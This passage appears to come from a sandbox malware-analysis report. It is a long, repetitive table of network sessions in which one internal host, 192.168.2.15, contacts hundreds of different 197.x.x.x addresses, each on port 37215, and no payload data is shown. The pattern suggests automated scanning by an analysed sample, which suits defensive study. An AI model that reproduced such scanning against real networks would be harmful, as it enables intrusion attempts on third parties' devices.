                                                                            14134192.168.2.1557602197.105.100.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14135192.168.2.1556570197.94.200.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14136192.168.2.1552186197.203.236.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14137192.168.2.1554342197.233.224.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14138192.168.2.1541202197.26.8.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14139192.168.2.1549866197.100.120.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14140192.168.2.1540930197.76.200.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14141192.168.2.1556498197.27.44.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14142192.168.2.1546722197.205.66.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14143192.168.2.1540808197.239.197.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14144192.168.2.1557010197.154.110.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14145192.168.2.1551548197.84.153.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14146192.168.2.1544820197.233.167.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14147192.168.2.1542552197.80.4.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14148192.168.2.1545432197.140.172.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14149192.168.2.1548270197.117.138.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14150192.168.2.1534326197.104.183.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14151192.168.2.1550006197.133.179.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14152192.168.2.1544378197.119.140.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14153192.168.2.1544464197.172.88.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14154192.168.2.1555186197.138.252.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14155192.168.2.1546526197.80.253.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14156192.168.2.1541158197.236.145.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14157192.168.2.1534928197.143.18.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14158192.168.2.1538760197.49.174.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14159192.168.2.1556648197.56.188.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14160192.168.2.1546186197.27.157.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14161192.168.2.1556766197.250.129.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14162192.168.2.1555948197.46.39.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14163192.168.2.1552078197.175.151.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14164192.168.2.1552130197.46.229.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14165192.168.2.1544052197.23.36.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14166192.168.2.1548468197.113.58.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14167192.168.2.1544680197.189.93.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14168192.168.2.1554032197.36.59.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14169192.168.2.1559702197.154.1.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14170192.168.2.1544248197.253.172.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14171192.168.2.1549686197.152.178.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14172192.168.2.1550466197.95.145.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14173192.168.2.1542968197.47.103.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14174192.168.2.1555526197.44.207.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14175192.168.2.1548956197.72.142.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14176192.168.2.1548358197.4.115.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14177192.168.2.1558630197.168.103.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14178192.168.2.1549562197.117.111.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14179192.168.2.1558384197.16.205.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14180192.168.2.1535134197.227.173.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14181192.168.2.1545558197.181.23.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14182192.168.2.1535694197.57.158.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14183192.168.2.1552334197.107.122.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14184192.168.2.1552594197.67.214.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14185192.168.2.1548590197.40.55.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14186192.168.2.1553970197.125.119.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14187192.168.2.1552080197.159.175.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14188192.168.2.1553208197.224.220.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14189192.168.2.1551256197.240.158.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14190192.168.2.1546894197.79.116.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14191192.168.2.1548980197.80.224.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14192192.168.2.1542456197.38.26.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14193192.168.2.1536370197.32.168.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14194192.168.2.1556596197.73.61.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14195192.168.2.1553078197.103.35.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14196192.168.2.1540938197.57.36.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14197192.168.2.1532844197.40.50.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14198192.168.2.1537144197.229.192.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14199192.168.2.1558356197.205.107.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14200192.168.2.1549602197.217.108.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14201192.168.2.1542564197.81.209.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14202192.168.2.1558176197.77.220.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14203192.168.2.1533862197.7.209.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14204192.168.2.1543834197.12.155.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14205192.168.2.1537540197.180.152.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14206192.168.2.1544284197.169.153.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14207192.168.2.1554398197.51.216.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14208192.168.2.1549016197.37.235.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14209192.168.2.1554558197.244.233.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14210192.168.2.1543002197.128.112.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14211192.168.2.1537220197.153.129.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14212192.168.2.1558494197.129.198.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14213192.168.2.1547844197.186.101.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14214192.168.2.1553734197.167.196.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14215192.168.2.1542616197.71.57.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14216192.168.2.1550348197.129.227.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14217192.168.2.1560232197.212.198.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14218192.168.2.1536346197.187.39.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14219192.168.2.1557920197.96.247.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14220192.168.2.1553744197.68.113.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14221192.168.2.1534898197.16.51.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14222192.168.2.1546442197.86.119.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14223192.168.2.1547292197.147.29.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14224192.168.2.1542382197.8.166.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14225192.168.2.1557826197.118.137.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14226192.168.2.1549302197.7.224.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14227192.168.2.1540964197.87.85.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14228192.168.2.1544654197.46.255.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14229192.168.2.1558284197.100.124.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14230192.168.2.1546590197.124.13.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14231192.168.2.1550506197.26.235.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14232192.168.2.1541918197.186.66.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14233192.168.2.1554370197.182.128.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14234192.168.2.1546908197.41.1.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14235192.168.2.1541698197.156.126.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14236192.168.2.1559992197.237.138.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14237192.168.2.1551950197.63.193.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14238192.168.2.1548212197.205.139.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14239192.168.2.1546318197.85.201.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14240192.168.2.1550998197.24.75.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14241192.168.2.1555866197.102.171.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14242192.168.2.1559456197.68.250.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14243192.168.2.1543034197.120.209.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14244192.168.2.1536488197.149.82.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14245192.168.2.1559590197.3.16.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14246192.168.2.1537806197.187.66.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14247192.168.2.1556044197.196.9.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14248192.168.2.1538632197.210.193.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14249192.168.2.1551090197.154.229.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14250192.168.2.1549370197.75.94.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14251192.168.2.1548326197.235.82.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14252192.168.2.1541084197.222.215.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14253192.168.2.1560320197.174.35.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14254192.168.2.1549078197.237.169.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14255192.168.2.1542204197.142.21.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14256192.168.2.1557370197.210.101.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14257192.168.2.1557166197.162.163.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14258192.168.2.1543916197.18.73.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14259192.168.2.1533786197.125.196.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14260192.168.2.1534840197.96.224.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14261192.168.2.1560874197.34.18.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14262192.168.2.1553240197.49.222.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14263192.168.2.1538394197.242.223.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14264192.168.2.1541422197.75.128.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14265192.168.2.1538054197.107.218.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14266192.168.2.1556800197.120.218.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14267192.168.2.1557734197.91.55.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14268192.168.2.1534356197.149.142.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14269192.168.2.1548728197.128.243.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14270192.168.2.1552370197.148.98.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14271192.168.2.1535722197.151.44.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14272192.168.2.1537616197.226.240.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14273192.168.2.1547452197.230.42.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14274192.168.2.1559690197.42.170.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14275192.168.2.1559392197.5.67.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14276192.168.2.1556908197.254.171.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14277192.168.2.1549136197.140.112.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14278192.168.2.1554758197.53.181.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14279192.168.2.1558642197.104.95.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14280192.168.2.1546192197.57.239.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14281192.168.2.1541678197.201.68.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14282192.168.2.1540446197.72.124.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14283192.168.2.1536594197.13.38.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14284192.168.2.1545792197.151.157.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14285192.168.2.1555568197.222.172.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14286192.168.2.1546908197.208.216.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14287192.168.2.1536164197.248.11.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14288192.168.2.1542470197.111.10.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14289192.168.2.1554996197.44.250.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14290192.168.2.1553152197.74.197.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14291192.168.2.1545990197.154.78.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14292192.168.2.1558826197.85.198.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14293192.168.2.1542940197.242.1.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14294192.168.2.1542962197.175.56.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14295192.168.2.1547720197.88.179.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14296192.168.2.1548304197.234.135.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14297192.168.2.1546394197.116.164.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14298192.168.2.1559378197.86.193.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14299192.168.2.1547214197.121.139.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14300192.168.2.1542366197.212.247.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14301192.168.2.1534376197.48.88.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14302192.168.2.1556592197.163.13.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14303192.168.2.1560882197.158.219.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14304192.168.2.1552414197.231.71.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14305192.168.2.1534334197.121.46.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14306192.168.2.1545318197.7.146.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14307192.168.2.1553958197.94.79.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14308192.168.2.1546704197.83.192.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14309192.168.2.1547094197.29.222.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14310192.168.2.1553018197.134.38.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14311192.168.2.1532770197.135.210.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14312192.168.2.1560290197.110.150.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14313192.168.2.1538094197.146.72.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14314192.168.2.1545226197.100.165.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14315192.168.2.1558888197.220.1.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14316192.168.2.1551632197.39.156.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14317192.168.2.1540136197.112.216.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14318192.168.2.1538008197.182.108.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14319192.168.2.1542286197.246.74.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14320192.168.2.1546194197.164.154.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14321192.168.2.1551516197.157.103.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14322192.168.2.1553792197.63.22.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14323192.168.2.1539508197.90.22.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14324192.168.2.1548976197.206.189.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14325192.168.2.1543568197.28.62.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14326192.168.2.1551162197.253.199.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14327192.168.2.1534152197.215.30.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14328192.168.2.1541080197.171.135.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14329192.168.2.1538316197.39.240.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14330192.168.2.1557800197.179.239.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14331192.168.2.1545602197.47.72.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14332192.168.2.1538782197.81.186.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14333192.168.2.1542316197.92.145.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
